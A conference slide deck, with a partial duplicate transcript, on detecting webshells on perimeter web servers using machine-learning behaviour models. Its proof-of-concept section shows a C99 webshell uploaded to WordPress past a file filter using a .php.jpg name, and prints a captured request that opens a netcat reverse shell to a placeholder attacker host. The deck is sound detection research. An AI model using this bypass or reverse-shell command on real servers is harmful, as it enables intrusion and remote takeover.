Detecting Webshells in Compromised Perimeter Assets Using ML Algorithms
Rod Soto @rodsoto
Joseph Zadeh @josephzadeh
$Whoami
Rod Soto has over 15 years of experience in information technology and security. He is a security researcher and secretary
of the board of Hackmiami. He has spoken at ISSA, ISC2, OWASP, DEFCON, BlackHat, RSA, Hackmiami, and Bsides,
and has been featured in Rolling Stone Magazine, Pentest Magazine, Univision, and CNN. Rod Soto was the winner of the
2012 BlackHat Las Vegas CTF competition and is the founder and lead developer of the Kommand && KonTroll competitive
hacking tournament series.
Joseph Zadeh studied mathematics in college and received a BS from the University of California, Riverside and an MS and PhD
from Purdue University. While in college, he worked in a Network Operation Center focused on security and network
performance baselines, and during that time he spoke at the DEFCON and Torcon security conferences. Most recently he joined
Caspida as a security data scientist. Previously, Joseph was part of the data science consulting team at Greenplum/Pivotal,
focused on cyber security analytics, and was also part of Kaiser Permanente's first cyber security R&D team.
Webshell Introduction
The Perimeter
A network perimeter is the boundary between the private, locally managed-and-owned side
of a network and the public, usually provider-managed side of a network.*
What Are Perimeter Assets?
Perimeter assets are the infrastructure and application items that are exposed to
the internet or WAN. These may include:
- Routers
- IoTs (Cameras, RF,
- Firewalls/IDS/Load Balancers
- Servers (HTTP, DNS, IMAP, SMTP, SSH, VPN, etc)
- Yes… Cloud assets are also part of the perimeter as long as they have a link,
connection, shared credentials, or access from within the organization.
Perimeter Assets: First Line Of Defense
Logically, perimeter assets are the first line of defense.
- Constantly under attack
- Vulnerable to unknown/0-days (e.g., Heartbleed, Shellshock)
- Defenders must constantly monitor, update, patch
- Rely heavily on static signature technology, which is reactive and passive
- 3rd party risks (Forgotten/Shared/Collocated, Unpatched, Unsecured APIs)
Perimeter Assets Can Become Unexpected Backdoors
Or more like a front door... Because they are exposed to the entire world, it is possible
to begin a campaign by attacking network perimeter assets and from there work
your way into the organization.
Consider this… Most organizations nowadays only expose ports 80 or 443, so it is
logical that web servers are prime targets, as are other internet-delivered
services such as mail, CMS, CRM, dev, storage, etc.
Do you think they might use the same credentials
internally? Maybe for mail clients? Storage?
Why Use A Webshell
- Stealthy, compact, multi-functional tool
- Leverages the programming language used in
the web application (PHP, Java, ASP, etc)
- Obfuscates commands so they appear as ordinary web traffic
- Covert channel using SSL/TLS
What Is A Webshell
“A web shell is a script that can be uploaded to a
web server to enable remote administration of
the machine. Infected web servers can be either
Internet-facing or internal to the network, where
the web shell is used to pivot further to internal
hosts.” US CERT
Webshells
Webshells Can Be Powerful Weapons
Some Examples Of Webshells
- C99, C100
- R57
- PhpJackal (evades AV)
- Soldier of Allah (Al-Qaeda webshell)
- Weevely (Terminal like webshell,
very effective, small footprint)
- AspxSpy
- WSO (Web Shell by Orb)
- China Chopper (Has thick client)
- JspWebshell
- rootshell
Common Functions Of Webshells
- Authentication
- Remote administration / C2
- File management (View, Copy, Move, Upload, Download)
- Database management/connection
- Command Shell (ls, pwd, nc, cat, etc)
- Entrenchment (create persistence via new mechanisms like NC, Python, Perl)
- Encoding/Encryption
Webshells Can Provide Further Access
- Attackers often place a webshell and then use it to gain further access. Some
common next steps are:
- Stealing credentials
- Capturing traffic (Stats, behavior, protocols, etc)
- Footprinting internal network
- Local root/system exploits
How Are These Webshells Delivered?
Web shells can be delivered through a number of web application exploits or
configuration weaknesses including:
- Cross-Site Scripting
- SQL Injection
- Vulnerabilities in applications/services (e.g., WordPress or other CMS applications)
- File processing vulnerabilities (e.g., upload filtering or assigned permissions)
- Remote File Include (RFI) and Local File Include (LFI) vulnerabilities
- Exposed admin interfaces (possible areas to find the vulnerabilities mentioned above)
*US-CERT
Example Of An Exploit Campaign Using Webshell
Delivery of SamSam ransomware (2016)
- Exploit JBoss vulnerability (CVE-2010-0738/CVE-2013-4810) at exposed web server
- Upload webshell (jbossinvoker, zecmd, cmd, etc)
- JBoss running with high privileges? No problem
- JBoss running with low privileges? Upload a local root/system exploit
- Windows box? Upload PsExec (PowerShell now works on *nix as well)
- Distribute ransomware (SamSam), run Mimikatz? (PTH, PTT)
ML For Security
Layered ML
● Shades of Grey
– The layered security approach fuses multiple pieces of evidence together using a combination of models, rules, and
statistics to move past traditional detection solutions
● Sequencing Security Behaviors
– The next generation SIEM indexes all outputs and outcomes and uses rules, statistics, IOCs, and intelligence along
with the fusion of ML models to build a central nervous system view of all possible risks in an environment
● Evidence Fusion: Overlay risk categories on top of each system in the environment
– Defense Science Board, Resilient Military Systems and the Advanced Cyber Threat (Jan. 2013)
Use Case: Webshell on DMZ Asset ML Evidence Fusion
Attack stages:
- Exploit JBoss vulnerability (CVE-2010-0738/CVE-2013-4810) at exposed web server
- Attacker uploads lightweight webshell on compromised server (jbossinvoker, zecmd, cmd, etc)
- Beachhead established and trust relationship exploited from DMZ to LAN asset using in-memory malware
- Domain Controller is attacked and LDAP directory and credential hashes exfiltrated
ML Security Use Cases
- Exploit chain model analyzes new traffic for 0-days and deliveries of malicious payload (https://github.com/jzadeh/Aktaion)
- Asset discovery model monitors for changes in the asset graph and dynamically detects assets acting out of band from their peer group
- Beacon model analyzes communication for C2 patterns even when asynchronous or over small periods of activity
- AD Tree model detects admin credentials performing an out-of-band sequence of behavior
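The slides do not say how the outputs of the individual models are fused. As a rough sketch only, the snippet below assumes each model emits a score between 0 and 1 per asset and combines them with a noisy-OR. The function name, the asset names, and the noisy-OR rule itself are illustrative assumptions, not the method used in the talk.

```python
from collections import defaultdict

def fuse_evidence(alerts):
    """Combine per-model scores for each asset with a noisy-OR.

    alerts: iterable of (asset, model_name, score), score in [0, 1].
    Returns {asset: fused_score}. Noisy-OR is an assumed fusion rule.
    """
    # miss[asset] = product of (1 - score) over all models that fired
    miss = defaultdict(lambda: 1.0)
    for asset, _model, score in alerts:
        miss[asset] *= 1.0 - score
    return {asset: 1.0 - m for asset, m in miss.items()}

# Hypothetical scores from three of the models named on the slide
alerts = [
    ("dmz-web-01", "exploit_chain", 0.5),
    ("dmz-web-01", "asset_discovery", 0.5),
    ("dmz-web-01", "beacon", 0.5),
    ("lan-desktop-07", "beacon", 0.2),
]
fused = fuse_evidence(alerts)
```

Three moderate signals on the same DMZ asset add up to a higher fused score than any single one, which is the intuition behind layering models rather than alerting on each in isolation.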
Adversarial Models
• Machine learning loses effectiveness the more complex the adversary
Adversarial Models
Automatable Actions: Good for ML
Non-Automatable Actions: Hybrid Human/Computer Analysis
Operator Time is Valuable!
● Google's experience with ML in cybersecurity:
https://web.stanford.edu/class/cs259d/lectures/Session11.pdf
Detecting Webshells With ML
Detecting Webshells With ML: References
• https://www.crowdstrike.com/blog/mo-shells-mo-problems-deep-panda-web-shells/
• Going beyond the Indicator: https://vimeo.com/90687936
• Xin Sun, Xindai Lu, and Hua Dai. 2017. A Matrix Decomposition based Webshell Detection
Method. In Proceedings of the 2017 International Conference on Cryptography, Security and
Privacy (ICCSP '17). ACM, New York, NY, USA, 66-70. DOI:
https://doi.org/10.1145/3058060.3058083
• Ye Fei, Gong Jian, and Yang Wang. Black Box Detection of Webshell Based on Support Vector
Machine. School of Computer Science and Technology, Southeast University; Key Laboratory
of Computer Network Technology of Jiangsu Province:
http://en.cnki.com.cn/Article_en/CJFDTotal-NJHK201506020.htm
Lambda Defense: Webshell Decomposition
= Global + Local Models
How do we Detect Webshells Using ML
• New approaches in machine learning and data science can help improve detection of compromised
perimeter assets.
• Two models of webserver behavior: Global Asset Behavior and Local Webserver Content Behavior
(Dynamic + Static Content)
• The local feature vector answers questions like: How many times do users take a similar path on
the webserver? How rare, statistically, is the path this user is browsing?
• The global feature vector answers questions like: How often does this webserver communicate with
DMZ IPs? Has a trust relationship changed?
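To make the "how rare is this path" question concrete, here is a minimal sketch that scores a requested path by its surprisal against the request history of a single web server. The function name, the add-one smoothing, and the sample paths are assumptions made for illustration; the talk does not specify a formula.

```python
import math
from collections import Counter

def path_rarity(history, path):
    """Surprisal (in bits) of `path` given past requests on one web server.

    Add-one smoothing reserves one slot for never-seen paths, so an
    unseen path gets a finite but high score.
    """
    counts = Counter(history)
    total = len(history) + len(counts) + 1
    probability = (counts[path] + 1) / total
    return -math.log2(probability)

# Hypothetical request history for one site
history = ["/index.php"] * 6 + ["/about.php"]
common = path_rarity(history, "/index.php")
uncommon = path_rarity(history, "/about.php")
unseen = path_rarity(history, "/wp-content/uploads/2016/06/c9920161.php.jpg")
```

A score like this could serve as one component of the local feature vector, with the global vector built from asset-to-asset communication counts in a similar way.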
Global Model Example
Webshell
DMZ to LAN Trust
Beyond the Indicator
How do we Detect Webshells Using ML: Global Stats
Anomalies on rare paths
U->S
S->U !!
U->U (LAN to LAN)
S->S (DMZ to LAN)!!
Figure labels: Desktop, Server, Desktop, Laptop; LAN Asset, DMZ Server
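The path types on this slide can be read as direction pairs between asset roles. The sketch below assumes U means a user device and S means a server (the slide does not define the letters) and flags new flows whose role pair is rare in a baseline. The function name, the threshold, and the host names are hypothetical.

```python
from collections import Counter

def rare_edges(baseline_flows, new_flows, roles, max_share=0.05):
    """Return new flows whose role pair (e.g. "S->U") is rare in the baseline.

    baseline_flows / new_flows: lists of (src_host, dst_host).
    roles: {host: "U" or "S"}; the meaning of U and S is an assumption.
    """
    def pair(flow):
        src, dst = flow
        return roles[src] + "->" + roles[dst]

    counts = Counter(pair(f) for f in baseline_flows)
    total = sum(counts.values())
    flagged = []
    for flow in new_flows:
        share = counts[pair(flow)] / total if total else 0.0
        if share <= max_share:
            flagged.append(flow)
    return flagged

roles = {"desktop1": "U", "laptop1": "U", "web1": "S", "db1": "S"}
baseline = (
    [("desktop1", "web1")] * 40 + [("laptop1", "web1")] * 38
    + [("web1", "db1")] * 20 + [("desktop1", "laptop1")] * 2
)
new = [("desktop1", "web1"), ("web1", "desktop1"), ("web1", "db1")]
flagged = rare_edges(baseline, new, roles)
```

In this toy baseline a server never initiates a connection to a user device, so the S->U flow is the only one flagged. Distinguishing DMZ servers from LAN servers would need a zone label in addition to the role.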
Seeing the Analytic In Action
Once the identity resolution/learning process is complete, we
create new anomalies based on new paths/actions that are
rare for a particular population profile
Lightweight Webshell
in the DMZ
How do we detect Webshells using ML...
Based on these indicators we look for sequential behaviors. For example, we can
look at the sequence of requests for a fixed (IP/User, Web server) pair. We can use Bro
logs, web server logs, and perimeter traffic, as long as we have visibility into
the application layer.
By determining these sequences we can distinguish benign behavior from
sequences of behaviors that indicate webshell-like activity.
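As a small sketch of the sequencing step, the code below groups already-parsed log records into a time-ordered path sequence per (client, server) pair and lists transitions never seen in benign sequences. The record layout and both function names are assumptions; parsing Bro or web server logs into these tuples is left out.

```python
from collections import defaultdict

def build_sequences(records):
    """Group requests into time-ordered path sequences per (client, server).

    records: iterable of (timestamp, client, server, path) tuples.
    """
    sequences = defaultdict(list)
    for _ts, client, server, path in sorted(records):
        sequences[(client, server)].append(path)
    return dict(sequences)

def unseen_transitions(sequence, benign_sequences):
    """Return consecutive (a, b) steps that never occur in the benign set."""
    known = {(a, b) for s in benign_sequences for a, b in zip(s, s[1:])}
    return [(a, b) for a, b in zip(sequence, sequence[1:]) if (a, b) not in known]

# Hypothetical records, deliberately out of order
records = [
    (3, "10.0.0.9", "web1", "/wp-admin/"),
    (1, "10.0.0.9", "web1", "/"),
    (2, "10.0.0.9", "web1", "/wp-login.php"),
    (1, "10.0.0.5", "web1", "/"),
]
sequences = build_sequences(records)
benign = [["/", "/wp-login.php"]]
novel = unseen_transitions(sequences[("10.0.0.9", "web1")], benign)
```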
Local Model Example
How do we Detect Webshells Using ML: Local Stats
Using machine learning techniques we can compute and build up statistics around some key data points.
In the context of this particular vector we can use rarity (low frequency counts) for a fixed website:
- Rare time of site usage
- Rare timestamps and creation of files
- Rare connection patterns
- Large number of POST/GET requests to a specific file
- Connection strings with command arguments (cmd.exe, /bin/bash, nc)
- Unusual direct connections to files exposed to the internet
- Unusual UA in comparison to normal traffic patterns when users visit the website or search
engines index the site
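A few of the statistics in this list can be sketched directly. The example below assumes requests for one website have already been parsed into dictionaries with `method`, `path`, `ua`, and `body` keys (a hypothetical layout) and computes POST counts per file, command-argument hits, and rare user agents. The threshold and the regular expression are illustrative choices.

```python
import re
from collections import Counter

# Command arguments named on the slide: cmd.exe, /bin/bash, nc
CMD_PATTERN = re.compile(r"cmd\.exe|/bin/bash|\bnc\b", re.IGNORECASE)

def local_stats(requests, rare_ua_share=0.1):
    """Return (POST count per file, list of (path, reasons)) for one site."""
    ua_counts = Counter(r["ua"] for r in requests)
    total = len(requests)
    posts_per_file = Counter(r["path"] for r in requests if r["method"] == "POST")
    flagged = []
    for r in requests:
        reasons = []
        if CMD_PATTERN.search(r["body"]) or CMD_PATTERN.search(r["path"]):
            reasons.append("command argument")
        if ua_counts[r["ua"]] / total <= rare_ua_share:
            reasons.append("rare user agent")
        if reasons:
            flagged.append((r["path"], reasons))
    return posts_per_file, flagged

# Hypothetical traffic: nine ordinary page views and one webshell command
requests = [
    {"method": "GET", "path": "/index.php", "ua": "Mozilla/5.0", "body": ""}
    for _ in range(9)
]
requests.append({
    "method": "POST",
    "path": "/uploads/shell.php.jpg",
    "ua": "curl/7.0",
    "body": "cmd=nc -e /bin/bash 10.0.0.5 9999",
})
posts_per_file, flagged = local_stats(requests)
```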
Webshell detection POC/Example
For the proof of concept, we gathered data on benign, normal browsing behavior and
then replicated an RFI (Remote File Inclusion) attack, uploading a C99
webshell to the target host. In this particular sequence of referrer items, the attacker
can be seen browsing around the site, possibly footprinting and searching
for input fields.
Webshell detection POC/Example
The sample referrer sequence below shows browsing around the victim web site:
Referer: http://victimdomain/wordpress/?p=9
Referer: http://victimdomain/wordpress/wp-content/themes/default/style.css
Referer: http://victimdomain/wordpress/wp-content/plugins/category-grid-view-gallery/css/style.css?ver=2.8.5
Further review of referrers shows access to the WordPress login and admin pages:
Referer: http://victimdomain/wordpress/wp-login.php
Referer: http://victimdomain/wordpress/wp-admin/
Webshell POC/Example
The following sequence shows the attacker accessing the post feature and
uploading a C99 shell, bypassing sanitization controls by adding a .jpg extension to
the actual shell “c9920161.php”. This is done by abusing the new post feature, which
includes uploading media:
00:28:39.469021 IP attackerIP.51399 > victimdomain.80: Flags [P.], seq 13419:14264, ack 145980, win 4096, options [nop,nop,TS val 787343940 ecr 195280], length 845: HTTP: GET /wordpress/wp-content/plugins/a-gallery/timthumb.php?src=http://victimdomain/wordpress/wp-content/uploads/2016/06/c992016.php.jpg&w=125&h=125&zc=1 HTTP/1.1
...D....GET /wordpress/wp-content/plugins/a-gallery/timthumb.php?src=http://victimdomain/wordpress/wp-content/uploads/2016/06/c9920161.php.jpg&w=125&h=125&zc=1 HTTP/1.1
Webshell detection POC/Example
Referer: http://victimdomain/wordpress/wp-admin/post-new.php (Here is where
the web shell is uploaded)
Finally, the referrer sequence below shows the attacker browsing to the web shell.
The frequency of access to it is a signal of operator behavior in the sequential
component of the TTP:
Referer: http://victimdomain/wordpress/?p=13
Referer: http://victimdomain/wordpress/wp-content/uploads/
Referer: http://victimdomain/wordpress/wp-content/uploads/2016/
Referer: http://victimdomain/wordpress/wp-content/uploads/2016/06/
Referer: http://victimdomain/wordpress/wp-content/uploads/2016/06/c9920161.php.jpg
Webshell detection POC/Example
The following packet capture snippet shows the attacker using netcat to open a reverse shell
through the C99 command execution feature:
00:33:26.996555 IP attackerIP.51421 > victimdomain.80: Flags [P.], seq 0:1014, ack 1, win 4117, options [nop,nop,TS val 787630908 ecr 267163], length 1014: HTTP: POST /wordpress/wp-content/uploads/2016/06/c9920161.php.jpg HTTP/1.1
E..*..@.@......q.......P.....U......%........K<....POST /wordpress/wp-content/uploads/2016/06/c9920161.php.jpg
Referer: http://victimdomain/wordpress/wp-content/uploads/2016/06/c9920161.php.jpg
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,es;q=0.6
Cookie: wordpress_test_cookie=WP+Cookie+check;wordpress_logged_in_c8c9d8ea3e0f27d770e745c21c00f45e=test%7C1465100854%7Cd83074c4a4a1c097c4eb44b42165d190; wp-settings-time-2=1464928107; PHPSESSID=cav3sgkd273gafknm9pb13m467

act=cmd&cmd=nc+-e+%2Fbin%2Fbash+attackerIP+9999&d=%2Fvar%2Fwww%2Fwordpress%2Fwp-content%2Fuploads%2F2016%2F06%2F&submit=Execute&cmd_txt=1
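The form-encoded POST body at the end of this capture can be decoded with the Python standard library to surface the command the operator sent. This is a minimal sketch: the token list mirrors the command arguments named earlier in the deck, and the function name and the simple substring match are illustrative assumptions.

```python
from urllib.parse import parse_qs

# Tokens taken from the "connection strings with command arguments" indicator
SUSPICIOUS_TOKENS = ("cmd.exe", "/bin/bash", "nc ")

def suspicious_params(body):
    """Decode a form-encoded body and return parameters containing a token."""
    hits = {}
    for name, values in parse_qs(body).items():
        for value in values:
            if any(token in value for token in SUSPICIOUS_TOKENS):
                hits[name] = value
    return hits

# POST body as it appears in the capture
body = (
    "act=cmd&cmd=nc+-e+%2Fbin%2Fbash+attackerIP+9999"
    "&d=%2Fvar%2Fwww%2Fwordpress%2Fwp-content%2Fuploads%2F2016%2F06%2F"
    "&submit=Execute&cmd_txt=1"
)
hits = suspicious_params(body)
```

Decoding first matters because the raw body hides `/bin/bash` behind `%2F` escapes, so a plain string match on the undecoded payload would miss it.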
Conclusion
Effective Webshell Detection via Machine Learning
• Webshell ML Detection Paradigm
• Two models of behavior: Local Behavior and Global Asset Behavior
• Local behavior is further broken down into individual history per path in a
webserver. The webserver model is maintained as two separate
graphs: one for dynamic content and one for static content
• Feature vectors for the local content and path anomalies on a per-webserver
basis are then correlated with global asset path behaviors.
Conclusion
- Machine learning and big data technologies enhance detection beyond
simple static signature-based defense technologies.
- It is possible to establish sequences of behaviors that indicate webshell
access and use.
- The data is already there. You can use your perimeter logs (Proxy, Firewalls,
Bro, Web Gateway, etc).
- Detection mechanisms can also be enhanced and extended by covering any
other measurable attack vector that delivers a web shell payload (SQLi, XSS,
other types of RFI, etc).
Q&A
Appendix
Operational ML: How to Detect Attack Patterns That Change Over Time
Step 1: Break the problem into use cases
Step 2: Find which use cases have the highest security impact
Step 3: Decompose the problem into two types of computation
Arbitrary User Behavior = Sequential Component + “Un-Ordered” Component
Examples
Sequential Behaviors
1. Exploit Chains
2. Timing Analysis (Periodicity)
3. Active Directory Sequence
4. Authentication Graph
Non-Sequential Behaviors
1. Fingerprinting
2. Grouping Behaviors
3. Application Counts
4. Rare file extension counts for Webshell detection
Mapping Behaviors to Computational Paths
Easy to Parallelize
1. Count()
2. Average()
3. Time series()
4. Local state computations (per user/IP/account/…)
Hard to Parallelize (NC Complete Complexity)
1. Rank()
2. Median
3. Anything that keeps track of global state
4. Machine Learning Computations
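The split above can be illustrated with a toy example. Counts and averages can be computed independently per partition and merged from small partial results, while a median cannot be recovered by combining per-partition medians, because it depends on the global ordering of the data. The partitions and the helper name below are made up for illustration.

```python
from statistics import median

def merge_mean(partials):
    """Combine per-partition (count, total) pairs into a global mean."""
    count = sum(c for c, _ in partials)
    total = sum(t for _, t in partials)
    return total / count

# Two hypothetical partitions of the same metric
partitions = [[1, 2, 3], [4, 5, 6, 7, 100]]

# Each (count, sum) pair can be computed on its own worker
partials = [(len(p), sum(p)) for p in partitions]
global_mean = merge_mean(partials)

# The median needs the whole data set in one ordering
all_values = [v for p in partitions for v in p]
true_median = median(all_values)
median_of_medians = median(median(p) for p in partitions)
```

Here the merged mean is exact, but the median of the partition medians differs from the true median, which is why such statistics usually need either a global sort or an approximate sketch.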
Step 4: Build an ML Model for each important sub-behavior
Each Model can be batch, real-time or hybrid mode
Step 5: Operationalize the Model Life Cycle
How do we programmatically learn new patterns over time?
When is an ML model ready?
1. When should we re-train?
2. How should new data be weighted over old data?
3. How do we know when a model is ready?
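The slides leave these questions open. One common way to approach the second question is exponential decay, where an observation's weight halves after a fixed number of days. The sketch below is an assumption for illustration, not the authors' approach; the function name and the half-life value are hypothetical.

```python
def decayed_mean(observations, half_life_days):
    """Weighted mean where a weight halves every `half_life_days`.

    observations: iterable of (age_days, value); age 0 is the newest.
    """
    weighted_sum = 0.0
    weight_total = 0.0
    for age_days, value in observations:
        weight = 0.5 ** (age_days / half_life_days)
        weighted_sum += weight * value
        weight_total += weight
    return weighted_sum / weight_total

# Hypothetical daily request counts for one path: today and a week ago
observations = [(0, 10.0), (7, 2.0)]
recent_biased = decayed_mean(observations, half_life_days=7)
```

With a seven-day half-life the week-old value counts half as much as today's, so the result leans toward the recent observation. A shorter half-life adapts faster to change but is also easier for an attacker to drift slowly.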
The Lambda Defense: A Complex Design Pattern
Data sources: DHCP, IMS/IPAM, FW, Proxy, VPN, AD
Real Time Identity Resolution
Distributed ETL
Username = select coalesce(user_name, hostname, IP)
from Active_ID_Table
where IP = '10.10.100.23'
IP            DHCP.MAC           DHCP_Lasteventtime   AD_FQDN
10.100.1.23   58:5c:35:c3:6e:a4  2014-03-11T14:00:00  joe.eng.acme.com
10.13.11.221  12:3a:74:b2:6a:22  2014-03-12T14:30:00  ad.hr.acme.com
Diagram labels: Data Ingest; Sequential Models and IOCs; Large Scale Models and Non-Sequential IOCs; Real Time Layer; Batch Layer; Hybrid View (Batch + Real Time)

Detection of webshells in compromised perimeter assets using ML algorithms

  • 1. Detecting Webshells in Compromised Perimeter Assets Using ML Algorithms Rod Soto @rodsoto Joseph Zadeh @josephzadeh
  • 2. $Whoami Rod Soto has over 15 years of experience in information technology and security. He is a security researcher and secretary of the board of Hackmiami %27.He has spoken at ISSA, ISC2, OWASP, DEFCON, BlackHat, RSA, Hackmiami, Bsides and also been featured in Rolling Stone Magazine, Pentest Magazine, Univision and CNN. Rod Soto was the winner of the 2012 BlackHat Las vegas CTF competition and is the founder and lead developer of the Kommand && KonTroll competitive hacking Tournament series. Joseph Zadeh studied mathematics in college and received a BS from University California, Riverside and an MS and PhD from Purdue University. While in college, he worked in a Network Operation Center focused on security and network performance baselines and during that time he spoke at DEFCON and Torcon security conferences. Most recently he joined Caspida as a security data scientist. Previously, Joseph was part of the data science consulting team at Greenplum/Pivotal helping focused on Cyber Security analytics and also part of Kaiser Permanentes first Cyber Security R&D team.
  • 4. The Perimeter A network perimeter is the boundary between the private and locally managed-and-owned side of a network and the public and usually provider- managed side of a network.*
  • 5. What Are Perimeter Assets? Perimeter assets are those infrastructure, application items that are exposed on the internet or WAN. This may include: - Routers - IoTs (Cameras, RF, - Firewalls/IDS/Load Balancers - Servers (HTTP, DNS, IMAP, SMTP, SSH, VPN, etc) - Yes… Cloud assets are also part of perimeter as long as they have a link, connection, shared credentials or access from within the organization.
  • 6. Perimeter Assets: First Line Of Defense Logically perimeter assets are the first line of defense. - Constantly under attack - Vulnerable to unknown/0 days (I.E Heartbleed, Shellshock) - Defenders must constantly monitor, update, patch - Rely heavily on static signature technology, this technology is reactive, passive - 3rd party risks (Forgotten/Shared/Collocated, Unpatched, Unsecured APIs)
  • 7. Perimeter Assets Can Become Unexpected Back doors Or more like a front door.... As they are exposed to the entire world, it is possible to begin a campaign by attacking network perimeter assets and from there get your way into the organization. Consider this… Most organizations nowadays only expose 80 or 443, so it is logical that web servers are prime targets as well as other internet delivered services such as: MAIL, CMS, CRM, Dev, Storage, etc.
  • 8. Do you think they might use same credentials internally? Maybe mail clients? Storage?
  • 9. Why Use A Webshell - Stealth, compact multi functional tool - Leverage the programming language used in the web applications (PHP, JAVA, ASP, etc) - Obfuscate commands appearing “web traffic” - Covert channel using SSL/TLS
  • 10. What Is A Webshell
  • 11. What Is A Webshell “A web shell is a script that can be uploaded to a web server to enable remote administration of the machine. Infected web servers can be either Internet-facing or internal to the network, where the web shell is used to pivot further to internal hosts.” US CERT
  • 13. Webshells Can Be Powerful Weapons
  • 14. Some Examples Of Webshells - C99, C100 - R57 - PhpJackal (evades AV) - Soldier of Allah (Al-qaeda webshell) - Weevely (Terminal like webshell, very effective, small footprint) - AspxSpy - WSO (Web Shell by Orb) - China Chopper (Has thick client) - JspWebshell - rootshell
  • 15. Common Functions Of Webshells - Authentication - Remote administration / C2 - File management (View, Copy, Move, Upload, Download) - Database management/connection - Command Shell (ls, pwd, nc, cat, etc) - Entrenchment (create persistence via new mechanisms like NC, Python,Perl) - Encoding/Encryption
  • 16. Webshells Can Provide Further Access - Many times attacker will place webshell then proceed to further access. Some common next steps are: - Stealing credentials - Capturing traffic (Stats, behavior, protocols, etc) - Footprinting internal network - Local root/system exploits
  • 17. How Are These Webshells Delivered? Web shells can be delivered through a number of web application exploits or configuration weaknesses including: Cross-Site Scripting; SQL Injection; Vulnerabilities in applications/services (e.g., WordPress or other CMS applications); File processing vulnerabilities (e.g., upload filtering or assigned permissions); Remote File Include (RFI) and Local File Include (LFI) vulnerabilities; Exposed Admin Interfaces (possible areas to find vulnerabilities mentioned above). *US Cert
  • 18. Example Of An Exploit Campaign Using Webshell Delivery of SamSam ransomware (2016) - Exploit JBOSS vulnerability (CVE-2010-0738/ CVE-2013-4810) at exposed web server. - Upload webshell ( jbossinvoker, zecmd, cmd, etc) - JBoss running high on privs? No problem - JBoss with low privs, upload local root/system exploit - Windows box? upload PSexec (Powershell now works on *nix as well) - Distribute ransomware (SamSam), Run MimiKatz? (PTH,PTT)
  • 20. Layered ML 20 ● Shades of Grey – The layered security approach fuses multiple pieces of evidence together using a combination of models rules and statistics to move past the traditional detection solutions ● Sequencing Security Behaviors – The next generation SIEM indexes all outputs and outcomes and uses rules, statistics, IOC’s and intelligence along with the fusion of ML models to build a central nervous system view of all possible risks in an environment ● Evidence Fusion: Overlay risk categories on top of each system in the environment – Defense Science Board, Resilient Military Systems and the Advanced Cyber Threat (Jan. 2013)
  • 21. Use Case: Webshell on DMZ Asset (ML Evidence Fusion). Attack: (1) Exploit JBoss vulnerability (CVE-2010-0738/CVE-2013-4810) at exposed web server. ML Security Use Cases: (1) Exploit chain model analyzes new traffic for 0-days and deliveries of malicious payloads (https://github.com/jzadeh/Aktaion).
  • 22. Use Case: Webshell on DMZ Asset (ML Evidence Fusion). Attack: (1) Exploit JBoss vulnerability (CVE-2010-0738/CVE-2013-4810) at exposed web server. (2) Attacker uploads lightweight webshell on compromised server (jbossinvoker, zecmd, cmd, etc.). ML Security Use Cases: (1) Exploit chain model analyzes new traffic for 0-days and deliveries of malicious payloads (https://github.com/jzadeh/Aktaion). (2) Asset discovery model monitors for changes in the asset graph and dynamically detects assets acting out of band from their peer group.
  • 23. Use Case: Webshell on DMZ Asset (ML Evidence Fusion). Attack: (1) Exploit JBoss vulnerability (CVE-2010-0738/CVE-2013-4810) at exposed web server. (2) Attacker uploads lightweight webshell on compromised server (jbossinvoker, zecmd, cmd, etc.). (3) Beachhead established and trust relationship exploited from DMZ to LAN asset using in-memory malware. ML Security Use Cases: (1) Exploit chain model analyzes new traffic for 0-days and deliveries of malicious payloads (https://github.com/jzadeh/Aktaion). (2) Asset discovery model monitors for changes in the asset graph and dynamically detects assets acting out of band from their peer group. (3) Beacon model analyzes communication for C2 patterns even when asynchronous or over small periods of activity.
  • 24. Use Case: Webshell on DMZ Asset (ML Evidence Fusion). Attack: (1) Exploit JBoss vulnerability (CVE-2010-0738/CVE-2013-4810) at exposed web server. (2) Attacker uploads lightweight webshell on compromised server (jbossinvoker, zecmd, cmd, etc.). (3) Beachhead established and trust relationship exploited from DMZ to LAN asset using in-memory malware. (4) Domain Controller is attacked and LDAP directory and credential hashes exfiltrated. ML Security Use Cases: (1) Exploit chain model analyzes new traffic for 0-days and deliveries of malicious payloads (https://github.com/jzadeh/Aktaion). (2) Asset discovery model monitors for changes in the asset graph and dynamically detects assets acting out of band from their peer group. (3) Beacon model analyzes communication for C2 patterns even when asynchronous or over small periods of activity. (4) AD Tree model detects admin credentials performing an out-of-band sequence of behavior.
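The fusion step in this use case can be sketched roughly as follows. This is only an illustration, not the authors' implementation: it assumes each of the four models (exploit chain, asset discovery, beacon, AD tree) emits an independent probability-like score in [0, 1] for the same asset, and it combines them with a noisy-OR. The function name `fuse_evidence`, the score values, and the independence assumption are all hypothetical.

```python
from math import prod


def fuse_evidence(scores):
    """Noisy-OR fusion: chance that at least one independent signal is real.

    `scores` maps a (hypothetical) model name to a score in [0, 1].
    """
    for name, score in scores.items():
        if not 0.0 <= score <= 1.0:
            raise ValueError(f"score for {name} must be in [0, 1], got {score}")
    # Probability that every signal is a false alarm, then take the complement.
    return 1.0 - prod(1.0 - score for score in scores.values())


# Hypothetical per-model scores for one DMZ server.
dmz_server_scores = {
    "exploit_chain": 0.30,
    "asset_discovery": 0.20,
    "beacon": 0.40,
    "ad_tree": 0.10,
}
risk = fuse_evidence(dmz_server_scores)
print(f"fused risk: {risk:.3f}")
```

No single score here would cross a strict threshold on its own, yet the fused value is higher than any of them, which is the "shades of grey" idea: several weak pieces of evidence add up.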
  • 25. Adversarial Models • Machine learning loses effectiveness as the adversary becomes more complex
  • 26. Adversarial Models Automatable Actions: Good for ML. Non-Automatable Actions: Hybrid Human/Computer Analysis
  • 27. Operator Time is Valuable! ● Google's experience with ML in cybersecurity: https://web.stanford.edu/class/cs259d/lectures/Session11.pdf
  • 29. Detecting Webshells With ML: References • https://www.crowdstrike.com/blog/mo-shells-mo-problems-deep-panda-web-shells/ • Going beyond the Indicator: https://vimeo.com/90687936 • Xin Sun, Xindai Lu, and Hua Dai. 2017. A Matrix Decomposition based Webshell Detection Method. In Proceedings of the 2017 International Conference on Cryptography, Security and Privacy (ICCSP '17). ACM, New York, NY, USA, 66-70. DOI: https://doi.org/10.1145/3058060.3058083 • Ye Fei, Gong Jian, and Yang Wang. Black Box Detection of Webshell Based on Support Vector Machine. School of Computer Science and Technology, Southeast University; Key Laboratory of Computer Network Technology of Jiangsu Province. http://en.cnki.com.cn/Article_en/CJFDTotal-NJHK201506020.htm
  • 30. Lambda Defense: Webshell Decomposition
  • 31. Lambda Defense: Webshell Decomposition = Global + Local Models
